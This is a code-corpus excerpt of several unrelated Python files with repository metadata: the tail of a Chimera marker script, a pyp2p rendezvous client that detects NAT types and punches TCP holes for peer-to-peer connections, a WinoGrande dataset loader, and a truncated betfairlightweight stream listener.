mark=s.place_marker((545.685, 618.369, 516.722), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_4" not in marker_sets:
s=new_marker_set('Cog6_4')
marker_sets["Cog6_4"]=s
s= marker_sets["Cog6_4"]
mark=s.place_marker((529.45, 637.64, 504.131), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_5" not in marker_sets:
s=new_marker_set('Cog6_5')
marker_sets["Cog6_5"]=s
s= marker_sets["Cog6_5"]
mark=s.place_marker((503.898, 649.46, 504.024), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_6" not in marker_sets:
s=new_marker_set('Cog6_6')
marker_sets["Cog6_6"]=s
s= marker_sets["Cog6_6"]
mark=s.place_marker((485.653, 651.972, 482.457), (0.21, 0.49, 0.72), 17.1475)
if "Cog6_GFPC" not in marker_sets:
s=new_marker_set('Cog6_GFPC')
marker_sets["Cog6_GFPC"]=s
s= marker_sets["Cog6_GFPC"]
mark=s.place_marker((437.984, 596.805, 527.398), (0.21, 0.49, 0.72), 18.4716)
if "Cog6_Anch" not in marker_sets:
s=new_marker_set('Cog6_Anch')
marker_sets["Cog6_Anch"]=s
s= marker_sets["Cog6_Anch"]
mark=s.place_marker((535.785, 704.79, 433.897), (0.21, 0.49, 0.72), 18.4716)
if "Cog7_GFPN" not in marker_sets:
s=new_marker_set('Cog7_GFPN')
marker_sets["Cog7_GFPN"]=s
s= marker_sets["Cog7_GFPN"]
mark=s.place_marker((445.351, 559.719, 553.907), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_0" not in marker_sets:
s=new_marker_set('Cog7_0')
marker_sets["Cog7_0"]=s
s= marker_sets["Cog7_0"]
mark=s.place_marker((470.355, 551.697, 549.464), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_1" not in marker_sets:
s=new_marker_set('Cog7_1')
marker_sets["Cog7_1"]=s
s= marker_sets["Cog7_1"]
mark=s.place_marker((523.556, 532.863, 537.835), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_2" not in marker_sets:
s=new_marker_set('Cog7_2')
marker_sets["Cog7_2"]=s
s= marker_sets["Cog7_2"]
mark=s.place_marker((575.373, 510.886, 525.488), (0.7, 0.7, 0.7), 17.1475)
if "Cog7_GFPC" not in marker_sets:
s=new_marker_set('Cog7_GFPC')
marker_sets["Cog7_GFPC"]=s
s= marker_sets["Cog7_GFPC"]
mark=s.place_marker((592.253, 541.985, 598.089), (0.7, 0.7, 0.7), 18.4716)
if "Cog7_Anch" not in marker_sets:
s=new_marker_set('Cog7_Anch')
marker_sets["Cog7_Anch"]=s
s= marker_sets["Cog7_Anch"]
mark=s.place_marker((632.387, 458.157, 455.836), (0.7, 0.7, 0.7), 18.4716)
if "Cog8_0" not in marker_sets:
s=new_marker_set('Cog8_0')
marker_sets["Cog8_0"]=s
s= marker_sets["Cog8_0"]
mark=s.place_marker((521, 599.409, 587.095), (1, 0.5, 0), 17.1475)
if "Cog8_1" not in marker_sets:
s=new_marker_set('Cog8_1')
marker_sets["Cog8_1"]=s
s= marker_sets["Cog8_1"]
mark=s.place_marker((517.239, 571.446, 583.875), (1, 0.5, 0), 17.1475)
if "Cog8_2" not in marker_sets:
s=new_marker_set('Cog8_2')
marker_sets["Cog8_2"]=s
s= marker_sets["Cog8_2"]
mark=s.place_marker((512.382, 544.641, 575.086), (1, 0.5, 0), 17.1475)
if "Cog8_3" not in marker_sets:
s=new_marker_set('Cog8_3')
marker_sets["Cog8_3"]=s
s= marker_sets["Cog8_3"]
mark=s.place_marker((505.818, 517.977, 566.637), (1, 0.5, 0), 17.1475)
if "Cog8_4" not in marker_sets:
s=new_marker_set('Cog8_4')
marker_sets["Cog8_4"]=s
s= marker_sets["Cog8_4"]
mark=s.place_marker((497.866, 491.326, 559.67), (1, 0.5, 0), 17.1475)
if "Cog8_5" not in marker_sets:
s=new_marker_set('Cog8_5')
marker_sets["Cog8_5"]=s
s= marker_sets["Cog8_5"]
mark=s.place_marker((492.895, 468.822, 542.811), (1, 0.5, 0), 17.1475)
if "Cog8_GFPC" not in marker_sets:
s=new_marker_set('Cog8_GFPC')
marker_sets["Cog8_GFPC"]=s
s= marker_sets["Cog8_GFPC"]
mark=s.place_marker((494.272, 547.923, 557.013), (1, 0.6, 0.1), 18.4716)
if "Cog8_Anch" not in marker_sets:
s=new_marker_set('Cog8_Anch')
marker_sets["Cog8_Anch"]=s
s= marker_sets["Cog8_Anch"]
mark=s.place_marker((491.083, 388.156, 526.611), (1, 0.6, 0.1), 18.4716)
for k in surf_sets.keys():
chimera.openModels.add([surf_sets[k]])
| [
"batxes@gmail.com"
] | batxes@gmail.com |
be8697cb49a18120c3513f680f36a42111d156ed | e21e7623d99312dc8a4c0eedc0febb22d24c7918 | /venv/lib/python3.8/site-packages/pyp2p/rendezvous_client.py | eee0fb064138eecdbbc7dc7e63861d063e5a2c91 | [] | no_license | axelonet/E-voting-system-on-blockchain | 49aa9b2b45f75e85ed9de4d113849c1f3d95dd1d | 2651bab50f29a2b68ad17b2d2240279af2f24419 | refs/heads/master | 2023-01-04T04:03:44.817356 | 2020-04-15T06:06:36 | 2020-04-15T06:06:36 | 255,822,230 | 1 | 0 | null | 2020-10-25T11:52:19 | 2020-04-15T06:12:39 | null | UTF-8 | Python | false | false | 29,185 | py | """
This module handles all the operations required to bootstrap
the peer-to-peer network. It includes a custom client for
talking to the Rendezvous Server allowing the program to
accept and request connections with simultaneous and passive
nodes.
* A passive node is a node which can receive inbound connections.
* A simultaneous node is a node that cannot receive inbound
connections but its NAT uses predictable mapping so it can
receive connections through TCP hole punching.
* A simultaneous node seeking to initiate hole punching I
refer to as an "active simultaneous node."
* A simultaneous node which has already bootstrapped
becomes a "passive simultaneous node" whose purpose it
is to accept challenges from active simultaneous nodes
until its inbound slots are full.
* All other nodes are active nodes. Leechers who can only make
connections and take up valuable slots in the network.
The only special thing about this module is the TCP hole
punching algorithm, also known as TCP simultaneous open - it
works by timing two connections to occur simultaneously so that
their SYN 3-way handshakes cross over in such a way that their
TCP state machines consider the connection open. To do this,
you predict the NAT's remote mapping for the port and arrange
for both nodes to connect to each other's predicted port
simultaneously.
Todo:
* Add better exception handling and tests.
"""
import gc
import logging
from threading import Thread
import psutil
from .lib import *
from .sock import *
# Debug logging.
logging.basicConfig()
log = logging.getLogger(__name__)
class RendezvousClient:
def __init__(self, nat_type, rendezvous_servers, interface="default",
sys_clock=None):
self.nat_type = nat_type
self.delta = 0
self.port_collisions = 1
self.nat_tests = 5
self.server_con = None
self.mappings = None
self.predictions = None
self.simultaneous_cons = []
self.ntp = 0
self.mapping_no = 4
self.rendezvous_servers = rendezvous_servers
self.interface = interface
self.ntp_delay = 6
self.timeout = 5 # Socket timeout.
self.predictable_nats = ["preserving", "delta"]
self.sys_clock = sys_clock
def server_connect(self, sock=None, index=None, servers=None):
# Get server index if appropriate.
servers = servers or self.rendezvous_servers[:]
if index is not None:
servers = [
servers[index]
]
for server in servers:
log.debug("Trying server:" + str(server))
try:
# Blank socket object.
con = Sock(
blocking=1,
interface=self.interface,
timeout=2
)
# Pre-bound socket.
if sock is not None:
con.set_sock(sock)
# Connect the socket.
con.connect(server["addr"], server["port"])
log.debug("server con made")
# Return Sock object.
return con
except socket.error as e:
log.debug("Error in server_connect: " + str(e))
continue
raise Exception("All rendezvous servers are down.")
# Delete any old rendezvous server state for node.
def leave_fight(self):
con = self.server_connect()
con.send_line("CLEAR")
con.close()
return 1
def add_listen_sock(self, mappings):
new_mappings = []
for mapping in mappings:
# Create the listen socket.
s = socket.socket(
socket.AF_INET,
socket.SOCK_STREAM
)
# Reuse existing local bind details.
for sock in [mapping["sock"], s]:
sock.setsockopt(
socket.SOL_SOCKET,
socket.SO_REUSEADDR,
1
)
# Bind to existing local port.
s.bind(mapping["sock"].getsockname())
# Start listening for connections.
s.listen(5)
# Reecord details.
mapping["listen"] = s
new_mappings.append(mapping)
return new_mappings
def attend_fight(self, mappings, node_ip, predictions, ntp):
"""
This function is for starting and managing a fight
once the details are known. It also handles the
task of returning any valid connections (if any) that
may be returned from threads in the simultaneous_fight function.
"""
# Bind listen server socket.
mappings = self.add_listen_sock(mappings)
log.debug(mappings)
# Walk to fight.
self.simultaneous_cons = []
predictions = predictions.split(" ")
self.simultaneous_fight(mappings, node_ip, predictions, ntp)
# Return hole made in opponent.
if len(self.simultaneous_cons):
"""
There may be a problem here. I noticed that when these lines
were removed during testing that connections tended to
succeed more. There may be a lack of synchronization between
the timing for connections to succeed so that a close on
one side of the fight ends up ruining valid connections on
this side. Will need to test more.
Notes: the UNL synchronization code could actually fix
this (potential) problem as a cool unintended side-effect.
"""
# Close unneeded holes.
"""
for i in range(1, len(self.simultaneous_cons)):
try:
print("Closing unneeded hole")
#self.simultaneous_cons[i].s.close()
except:
pass
"""
try:
# Return open hole.
return self.simultaneous_cons[0]
except:
# Try accept a connection.
log.debug("No holes found")
for mapping in mappings:
# Check if there's a new con.
s = mapping["listen"]
r, w, e = select.select(
[s],
[],
[],
0
)
# Find socket.
for found_sock in r:
# Not us.
if found_sock != s:
continue
# Accept a new con from the listen queue.
log.debug("Accept logic works!")
client, address = s.accept()
con = Sock(blocking=0)
con.set_sock(client)
return con
return None
def sequential_connect(self):
"""
Sequential connect is designed to return a connection to the
Rendezvous Server but it does so in a way that the local port
ranges (both for the server and used for subsequent hole
punching) are allocated sequentially and predictably. This is
because Delta+1 type NATs only preserve the delta value when
the source ports increase by one.
"""
# Connect to rendezvous server.
try:
mappings = sequential_bind(self.mapping_no + 1, self.interface)
con = self.server_connect(mappings[0]["sock"])
except Exception as e:
log.debug(e)
log.debug("this err")
return None
# First mapping is used to talk to server.
mappings.remove(mappings[0])
# Receive port mapping.
msg = "SOURCE TCP %s" % (str(mappings[0]["source"]))
con.send_line(msg)
reply = con.recv_line(timeout=2)
remote_port = self.parse_remote_port(reply)
if not remote_port:
return None
# Generate port predictions.
predictions = ""
if self.nat_type != "random":
mappings = self.predict_mappings(mappings)
for mapping in mappings:
predictions += str(mapping["remote"]) + " "
predictions = predictions.rstrip()
else:
predictions = "1337"
return [con, mappings, predictions]
def simultaneous_listen(self):
"""
This function is called by passive simultaneous nodes who
wish to establish themself as such. It sets up a connection
to the Rendezvous Server to monitor for new hole punching requests.
"""
# Close socket.
if self.server_con is not None:
self.server_con.s.close()
self.server_con = None
# Reset predictions + mappings.
self.mappings = None
self.predictions = None
# Connect to rendezvous server.
parts = self.sequential_connect()
if parts is None:
return 0
con, mappings, predictions = parts
con.blocking = 0
con.timeout = 0
con.s.settimeout(0)
self.server_con = con
self.mappings = mappings
self.predictions = predictions
# Register simultaneous node with server.
msg = "SIMULTANEOUS READY 0 0"
ret = self.server_con.send_line(msg)
if not ret:
return 0
return 1
def passive_listen(self, port, max_inbound=10):
try:
con = self.server_connect()
msg = "PASSIVE READY %s %s" % (str(port), str(max_inbound))
con.send_line(msg)
con.close()
return 1
except:
return 0
def predict_mappings(self, mappings):
"""
This function is used to predict the remote ports that a NAT
will map a local connection to. It requires the NAT type to
be determined before use. Current support for preserving and
delta type mapping behaviour.
"""
if self.nat_type not in self.predictable_nats:
msg = "Can't predict mappings for non-predictable NAT type."
raise Exception(msg)
for mapping in mappings:
mapping["bound"] = mapping["sock"].getsockname()[1]
if self.nat_type == "preserving":
mapping["remote"] = mapping["source"]
if self.nat_type == "delta":
max_port = 65535
mapping["remote"] = int(mapping["source"]) + self.delta
# Overflow or underflow = wrap port around.
if mapping["remote"] > max_port:
mapping["remote"] -= max_port
if mapping["remote"] < 0:
mapping["remote"] = max_port - -mapping["remote"]
# Unknown error.
if mapping["remote"] < 1 or mapping["remote"] > max_port:
mapping["remote"] = 1
mapping["remote"] = str(mapping["remote"])
return mappings
def throw_punch(self, args, tries=1):
"""
Attempt to open a hole by TCP hole punching. This
function is called by the simultaneous fight function
and its the code that handles doing the actual hole
punching / connecting.
"""
# Parse arguments.
if len(args) != 3:
return 0
sock, node_ip, remote_port = args
if sock is None or node_ip is None or remote_port is None:
return 0
# Generous timeout.
con = Sock(blocking=1, interface=self.interface)
con.set_sock(sock)
local = 0
if is_ip_private(node_ip):
"""
When simulating nodes on the same computer a delay needs to be set
for the loop back interface to simulate the delays that occur over
a WAN link. This requirement may also be needed for nodes on a LAN.
sudo tc qdisc replace dev lo root handle 1:0 netem delay 0.5sec
Speculation: The simulation problem may be to do with CPU cores.
If the program is run on the same core then the connects will always
be out of sync. If that's the case -- tries will need to be set to
~1000 which was what it was before. Perhaps a delay could be
simulated by sleeping for random periods if its a local connection?
That could help punch through at least once and then just set the
tries to >= 1000.
"""
tries = 20 # 20
local = 1
source_port = sock.getsockname()[1]
error = 0
log.debug("Throwing punch")
for i in range(0, tries):
# Attempt to connect.
try:
con.connect(node_ip, remote_port)
log.debug("Sim open success!")
# FATALITY.
# Atomic operation so mutex not required.
# Record hole made.
con.set_blocking(blocking=0, timeout=5)
self.simultaneous_cons.append(con)
return 1
except Exception as e:
# Punch was blocked, opponent is strong.
e = str(parse_exception(e))
log.debug(e)
error = 1
continue
if error:
sock.close()
return 0
def simultaneous_fight(self, my_mappings, node_ip, predictions, origin_ntp):
"""
TCP hole punching algorithm. It uses network time servers to
synchronize two nodes to connect to each other on their
predicted remote ports at the exact same time.
One thing to note is how sensitive TCP hole punching is to
timing. To open a successful connection both sides need to
have their SYN packets cross the NAT before the other side's
SYN arrives. Round-trip time for connections is 0 - 1000ms
depending on proximity. That's a very small margin of error
for hole punching, hence using NTP.
See "TCP Hole Punching" http://www.ietf.org/rfc/rfc5128.txt
and http://en.wikipedia.org/wiki/TCP_hole_punching
for more details.
"""
# Get current network time accurate to
# ~50 ms over WAN (apparently.)
p = request_priority_execution()
log.debug("Getting NTP")
if self.sys_clock is not None:
our_ntp = self.sys_clock.time()
else:
our_ntp = get_ntp()
log.debug("Our ntp = " + str(our_ntp))
if our_ntp is None:
return 0
# Synchronize code execution to occur at their NTP time + delay.
current = float(our_ntp)
future = float(origin_ntp) + float(self.ntp_delay)
sleep_time = future - current
# Check sleep time:
log.debug("Waiting for fight")
if sleep_time < 0:
log.debug("We missed the meeting! It happened " + str(-sleep_time) +
"seconds ago!")
return 0
if sleep_time >= 300:
log.debug("Future sleep time is too great!")
return 0
busy_wait(sleep_time)
release_priority_execution(p)
log.debug("At fight")
"""
Time.sleep isn't guaranteed to sleep for the time specified
which could cause synchronisation to be off between nodes
and different OS' as per the discretion of the task scheduler.
A busy wait is used to increase the accuracy of sleep.
http://stackoverflow.com/questions/17499837/python-time-sleep-vs-busy-wait-accuracy
http://stackoverflow.com/questions/1133857/how-accurate-is-pythons-time-sleep
"""
# Can you dodge my special?
"""
Making this algorithm "multi-threaded" has the potential to
ruin predicted mappings for delta type NATs and NATs that
have no care for source ports and assign incremental
ports no matter what.
"""
threads = []
log.debug("Mapping len " + str(len(my_mappings)))
for mapping in my_mappings:
# Tried all predictions.
prediction_len = len(predictions)
if not prediction_len:
break
# Throw punch.
prediction = predictions[0]
if self.nat_type == "delta":
self.throw_punch([mapping["sock"], node_ip, prediction])
else:
# Thread params.
args = ([
mapping["sock"],
node_ip,
prediction
], 20)
# Start thread.
t = Thread(
target=self.throw_punch,
args=args
)
threads.append(t)
t.start()
predictions.remove(prediction)
# Wait for threads to finish.
for t in threads:
t.join()
return 1
# Attempt to open an outbound connect through simultaneous open.
def simultaneous_challenge(self, node_ip, node_port, proto):
"""
Used by active simultaneous nodes to attempt to initiate
a simultaneous open to a compatible node after retrieving
its details from bootstrapping. The function advertises
itself as a potential candidate to the server for the
designated node_ip. It also waits for a response from the
node (if any) and attends any arranged fights.
"""
parts = self.sequential_connect()
if parts is None:
log.debug("Sequential connect failed")
return None
con, mappings, predictions = parts
# Tell server to list ourselves as a candidate for node.
msg = "CANDIDATE %s %s %s" % (node_ip, str(proto), predictions)
con.send_line(msg)
reply = con.recv_line(timeout=10)
log.debug(reply)
if "PREDICTION SET" not in reply:
log.debug("Prediction set failed")
return None
# Wait for node to accept and give us fight time.
# FIGHT 192.168.0.1 4552 345 34235 TCP 123123123.1\
reply = con.recv_line(timeout=10)
log.debug(reply)
con.s.close()
p = "^FIGHT ([0-9]+[.][0-9]+[.][0-9]+[.][0-9]+) ((?:[0-9]+\s?)+)"
p += " (TCP|UDP) ([0-9]+(?:[.][0-9]+)?)$"
parts = re.findall(p, reply)
if not len(parts):
log.debug("Invalid parts length")
return None
node_ip, predictions, proto, ntp = parts[0]
log.debug("Received fight details")
log.debug(str(parts[0]))
log.debug("Attending fight now")
return self.attend_fight(mappings, node_ip, predictions, ntp)
def parse_remote_port(self, reply):
"""
Parses a remote port from a Rendezvous Server's
response.
"""
remote_port = re.findall("^REMOTE (TCP|UDP) ([0-9]+)$", reply)
if not len(remote_port):
remote_port = 0
else:
remote_port = int(remote_port[0][1])
if remote_port < 1 or remote_port > 65535:
remote_port = 0
return remote_port
def delta_test(self, mappings):
"""
This function is designed to find the most commonly occurring
difference between a set of numbers given a predefined margin
of error. Its complexity is due to the fact that it allows
for port collisions which may occur during NAT mapping.
Its therefore more fault tolerant than simply considering
the difference between two numbers and hence more accurate
at determining a delta type NAT.
"""
# Calculate differences.
mapping_no = len(mappings)
differences = []
for i in range(0, mapping_no):
# Overflow.
if i + 1 >= mapping_no:
break
differences.append(mappings[i + 1]["remote"] -
mappings[i]["remote"])
differences = list(set(differences))
# Record delta pattern results.
delta = 0
for difference in differences:
"""
Calculate matches relative to each number for each difference.
The matches are relative to mappings[i]
"""
masked = []
for i in range(0, mapping_no):
matches = 0
for j in range(0, mapping_no):
# This is ourself.
if i == j:
continue
# Use value of mappings[i] to derive test value
# for mappings[j].
if i > j:
# How many bellow it?
test_val = mappings[i]["remote"] -\
(difference * (i - j))
else:
# How many above it?
test_val = mappings[i]["remote"] +\
(difference * (j - i))
# Pattern was predicted for relative comparison so
# increment matches.
if test_val == mappings[j]["remote"]:
matches += 1
# Matches parses the minimum threshold so these don't count
# as collisions.
if matches + 1 > self.port_collisions:
masked.append(mappings[i]["remote"])
# Check number of collisions satisfies delta requirement.
collision_no = mapping_no - len(masked)
if collision_no > self.port_collisions:
continue
if collision_no == int(mapping_no) / 2 and not mapping_no % 2:
"""
This means there's no way to be sure. The number of
collisions can be just as high as the number of
"successes", in which case it's a stalemate.
"""
continue
delta = difference
break
if delta:
nat_type = "delta"
else:
nat_type = "random"
ret = {
"nat_type": nat_type,
"delta": delta
}
return ret
def determine_nat(self, return_instantly=1):
"""
This function can predict 4 types of NATS.
(Not adequately tested yet.)
1. Preserving.
Source port == remote port
2. Delta.
Remote port == source port + delta.
3. Delta+1
Same as delta but delta is only preserved when
the source port increments by 1 (my understanding I
may have misunderstood.)
- This case is handled by manually using incremental,
sequential ports for punching operations.
4. Reuse.
Same source port + addr == previous mapped remote port
for that connection.
Good NAT characteristic references and definitions:
[0] http://nutss.gforge.cis.cornell.edu/pub/imc05-tcpnat.pdf
[1] http://doc.cacaoweb.org/misc/cacaoweb-and-nats/nat-behavioral-specifications-for-p2p-applications/#tcpholepun
[2] http://www.deusty.com/2007/07/nat-traversal-port-prediction-part-2-of.html
http://www.researchgate.net/publication/239801764_Implementing_NAT_Traversal_on_BitTorrent
[3] http://en.wikipedia.org/wiki/TCP_hole_punching
"""
# Already set.
if self.nat_type != "unknown":
return self.nat_type
nat_type = "random"
# Check collision ration.
if self.port_collisions * 5 > self.nat_tests:
msg = "Port collision number is too high compared to nat tests."
msg += " Collisions must be in ratio 1 : 5 to avoid ambiguity"
msg += " in test results."
raise Exception(msg)
# Load mappings for reuse test.
"""
Notes: This reuse test needs to ideally be performed against
bootstrapping nodes on at least two different addresses and
ports to each other because there are NAT types which
allocate new mappings based on changes to these variables.
"""
def custom_server_con(port=None, servers=None):
# Get connection to rendezvous server with random
# source port specified
servers = servers or self.rendezvous_servers
con = None
while con is None:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
port = port or get_unused_port()
sock.bind(('', port))
source_port = sock.getsockname()[1]
index = random.randrange(0, len(servers))
log.debug("Trying index: " + str(index))
con = self.server_connect(sock, index, servers)
except:
time.sleep(1)
sock.close()
# Record which server we're connected to.
server = list(con.s.getpeername())[:]
server = {
"addr": server[0],
"port": server[1]
}
# Get the port mappings and instruct remote host to disconnect
# This gives them the timewait state (we also connect to another
# server anyway so as to avoid using the exact same con tuple.)
con.send_line("SOURCE TCP " + str(source_port))
remote_port = con.recv_line(timeout=2)
remote_port = self.parse_remote_port(remote_port)
con.send_line("QUIT")
return source_port, remote_port, server
log.debug("Starting initial mappings for preserving + reuse tests")
mappings = []
for i in range(0, self.nat_tests):
src, remote, server = custom_server_con()
mappings.append({
"source": src,
"remote": int(remote),
"server": server
})
log.debug(mappings)
log.debug(len(mappings))
log.debug(self.nat_tests)
log.debug("Finished mappings")
# Preserving test.
preserving = 0
for mapping in mappings:
if mapping["source"] == mapping["remote"]:
preserving += 1
if preserving >= (self.nat_tests - self.port_collisions):
nat_type = "preserving"
if return_instantly:
return nat_type
"""
# Test reuse.
log.debug("Testing reuse")
reuse = 0
for mapping in mappings:
addr = ("www.example.com", 80)
servers = self.rendezvous_servers[:]
servers.remove(mapping["server"])
log.debug("servers = " + str(servers))
src, remote, junk = custom_server_con(mapping["source"], servers)
if remote == mapping["remote"]:
reuse += 1
# Check reuse results.
if reuse >= (self.nat_tests - self.port_collisions):
nat_type = "reuse"
if return_instantly:
return nat_type
# Load mappings for delta tests.
mappings = sequential_bind(self.nat_tests, self.interface)
for i in range(0, self.nat_tests):
con = self.server_connect(mappings[i]["sock"])
con.send_line("SOURCE TCP " + str(mappings[i]["source"]))
remote_port = self.parse_remote_port(con.recv_line(timeout=2))
mappings[i]["remote"] = int(remote_port)
con.s.close()
"""
# Delta test.
delta_ret = self.delta_test(mappings)
if delta_ret["nat_type"] != "random":
# Save delta value.
self.delta = delta_ret["delta"]
nat_type = "delta"
if return_instantly:
return nat_type
return nat_type
if __name__ == "__main__":
from pyp2p.net import rendezvous_servers
client = RendezvousClient(nat_type="preserving",
rendezvous_servers=rendezvous_servers)
| [
"anmolpanwar8@gmail.com"
] | anmolpanwar8@gmail.com |
196640e93c3fb69f365d16802339e2aa1414300b | 739e41d4f24f79c772d266cded0de9b759c6e953 | /venv/lib/python3.6/site-packages/nlp/datasets/winogrande/61dcf44f5c98e1c1c1526feabb5b487d0362949de206a1208b95d9042b89378c/winogrande.py | 6e0be715a32acff4004245b67b56d63b2cb8574b | [
"MIT"
] | permissive | MachineLearningBCAM/Minimax-risk-classifiers-NeurIPS-2020 | 24b7bbdecf459292f8b58be286feab3b9aa341ba | 82586c632268c103de269bcbffa5f7849b174a29 | refs/heads/main | 2023-05-18T15:41:13.495286 | 2021-06-11T18:21:35 | 2021-06-11T18:21:35 | 304,268,819 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,433 | py | """TODO(winogrande): Add a description here."""
from __future__ import absolute_import, division, print_function
import csv
import json
import os
import nlp
# TODO(winogrande): BibTeX citation
_CITATION = """\
@InProceedings{ai2:winogrande,
title = {WinoGrande: An Adversarial Winograd Schema Challenge at Scale},
authors={Keisuke, Sakaguchi and Ronan, Le Bras and Chandra, Bhagavatula and Yejin, Choi
},
year={2019}
}
"""
# TODO(winogrande):
_DESCRIPTION = """\
WinoGrande is a new collection of 44k problems, inspired by Winograd Schema Challenge (Levesque, Davis, and Morgenstern
2011), but adjusted to improve the scale and robustness against the dataset-specific bias. Formulated as a
fill-in-a-blank task with binary options, the goal is to choose the right option for a given sentence which requires
commonsense reasoning.
"""
_URL = 'https://storage.googleapis.com/ai2-mosaic/public/winogrande/winogrande_1.1.zip'
_SIZES = ['xs', 's', 'm', 'l', 'xl']
class WinograndeConfig(nlp.BuilderConfig):
""" BuilderConfig for Discofuse"""
def __init__(self,
data_size,
**kwargs
):
"""
Args:
data_size: the size of the training set we want to us (xs, s, m, l, xl)
**kwargs: keyword arguments forwarded to super.
"""
super(WinograndeConfig, self).__init__(
version=nlp.Version(
"1.0.0",
"New split API (https://tensorflow.org/datasets/splits)"),
**kwargs)
self.data_size = data_size
class Winogrande(nlp.GeneratorBasedBuilder):
"""TODO(winogrande): Short description of my dataset."""
# TODO(winogrande): Set up version.
VERSION = nlp.Version('1.1.0')
BUILDER_CONFIGS = [
WinograndeConfig(
name='winogrande_'+size,
description='AI2 dataset',
data_size=size
) for size in _SIZES
]
def _info(self):
# TODO(winogrande): Specifies the nlp.DatasetInfo object
return nlp.DatasetInfo(
# This is the description that will appear on the datasets page.
description=_DESCRIPTION,
# nlp.features.FeatureConnectors
features=nlp.Features({
'sentence': nlp.Value('string'),
'option1': nlp.Value('string'),
'option2': nlp.Value('string'),
'answer': nlp.Value('string')
# These are the features of your dataset like images, labels ...
}),
# If there's a common (input, target) tuple from the features,
# specify them here. They'll be used if as_supervised=True in
# builder.as_dataset.
supervised_keys=None,
# Homepage of the dataset for documentation
homepage='https://leaderboard.allenai.org/winogrande/submissions/get-started',
citation=_CITATION,
)
def _split_generators(self, dl_manager):
"""Returns SplitGenerators."""
# TODO(winogrande): Downloads the data and defines the splits
# dl_manager is a nlp.download.DownloadManager that can be used to
# download and extract URLs
dl_dir = dl_manager.download_and_extract(_URL)
data_dir = os.path.join(dl_dir, 'winogrande_1.1')
return [
nlp.SplitGenerator(
name=nlp.Split.TRAIN,
# These kwargs will be passed to _generate_examples
gen_kwargs={
'filepath': os.path.join(data_dir, 'train_{}.jsonl'.format(self.config.data_size)),
#'labelpath': os.path.join(data_dir, 'train_{}-labels.lst'.format(self.config.data_size)),
'split':'train'
},
),
nlp.SplitGenerator(
name=nlp.Split.TEST,
# These kwargs will be passed to _generate_examples
gen_kwargs={
'filepath': os.path.join(data_dir, 'test.jsonl'),
'split': 'test'
},
),
nlp.SplitGenerator(
name=nlp.Split.VALIDATION,
# These kwargs will be passed to _generate_examples
gen_kwargs={
'filepath': os.path.join(data_dir, 'dev.jsonl'),
#'labelpath': os.path.join(data_dir, 'dev-labels.lst'),
'split': 'dev'
},
),
]
def _generate_examples(self, filepath, split):
"""Yields examples."""
# TODO(winogrande): Yields (key, example) tuples from the dataset
with open(filepath) as f:
for id_, row in enumerate(f):
data = json.loads(row)
if split=='test':
yield id_, {
'sentence': data['sentence'],
'option1': data['option1'],
'option2': data['option2'],
'answer': ''
}
else:
yield id_,{
'sentence': data['sentence'],
'option1': data['option1'],
'option2': data['option2'],
'answer': data['answer']
}
# def _generate_test_example(filepath, split, labelpath=None):
# with open(filepath) as f:
# for id_, row in enumerate(f):
# data = json.loads(row)
# yield id_,{
# 'sentence': data['sentence'],
# 'option1': data['option1'],
# 'option2': data['option2'],
# 'answer': None
# }
| [
"adiaz@bcamath.org"
] | adiaz@bcamath.org |
24981d1ca550c828a9733f5955126a18a2d925b3 | 0aa98e0e7d9b63179eaaecd406e0b726594bed1e | /betfairlightweight/streaming/listener.py | c698f37f883a7971c3b36d6f140d8676a5e595c0 | [
"MIT"
] | permissive | alexeypavlenko/betfairlightweight | ce16c60cc8872961ca25452836098c90780ad84a | 3841ca88466abf08152b7a4d2b8fced196307105 | refs/heads/master | 2021-01-11T12:26:51.787855 | 2016-12-11T09:06:29 | 2016-12-11T09:06:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,568 | py | import json
import logging
import time
from .stream import MarketStream, OrderStream
class BaseListener:
def __init__(self):
self.market_stream = None
self.order_stream = None
def register_stream(self, unique_id, operation):
if operation == 'authentication':
logging.info('[Listener: %s]: %s' % (unique_id, operation))
elif operation == 'marketSubscription':
if self.market_stream is not None:
logging.warning('[Listener: %s]: marketSubscription stream already registered, replacing data' %
unique_id)
self.market_stream = self._add_stream(unique_id, operation)
elif operation == 'orderSubscription':
if self.order_stream is not None:
logging.warning('[Listener: %s]: orderSubscription stream already registered, replacing data' %
unique_id)
self.order_stream = self._add_stream(unique_id, operation)
def on_data(self, raw_data):
print(raw_data)
def _add_stream(self, unique_id, operation):
print('Register: %s %s' % (operation, unique_id))
def __str__(self):
return '<BaseListener>'
def __repr__(self):
return str(self)
class StreamListener(BaseListener):
"""Stream listener, processes results from socket,
holds a market and order stream which hold
market_book caches
"""
def __init__(self, output_queue=None):
super(StreamListener, self).__init__()
self.output_queue = output_queue
def on_data(self, raw_data):
"""Called when raw data is received from connection.
Override this method if you wish to manually handle
the stream data
:param raw_data: Received raw data
:return: Return False to stop stream and close connection
"""
try:
data = json.loads(raw_data)
except ValueError:
logging.error('value error: %s' % raw_data)
return
unique_id = data.get('id')
if self._error_handler(data, unique_id):
return False
operation = data.get('op')
if operation == 'connection':
self._on_connection(data, unique_id)
elif operation == 'status':
self._on_status(data, unique_id)
elif operation == 'mcm' or operation == 'ocm':
self._on_change_message(data, unique_id)
def _on_connection(self, data, unique_id):
"""Called on collection operation
:param data: Received data
"""
self.connection_id = data.get('connectionId')
logging.info('[Connect: %s]: connection_id: %s' % (unique_id, self.connection_id))
@staticmethod
def _on_status(data, unique_id):
"""Called on status operation
:param data: Received data
"""
status_code = data.get('statusCode')
logging.info('[Subscription: %s]: %s' % (unique_id, status_code))
def _on_change_message(self, data, unique_id):
change_type = data.get('ct', 'UPDATE')
operation = data.get('op')
if operation == 'mcm':
stream = self.market_stream
else:
stream = self.order_stream
logging.debug('[Subscription: %s]: %s: %s' % (unique_id, change_type, data))
if change_type == 'SUB_IMAGE':
stream.on_subscribe(data)
elif change_type == 'RESUB_DELTA':
stream.on_resubscribe(data)
elif change_type == 'HEARTBEAT':
stream.on_heartbeat(data)
elif change_type == 'UPDATE':
stream.on_update(data)
def _add_stream(self, unique_id, stream_type):
if stream_type == 'marketSubscription':
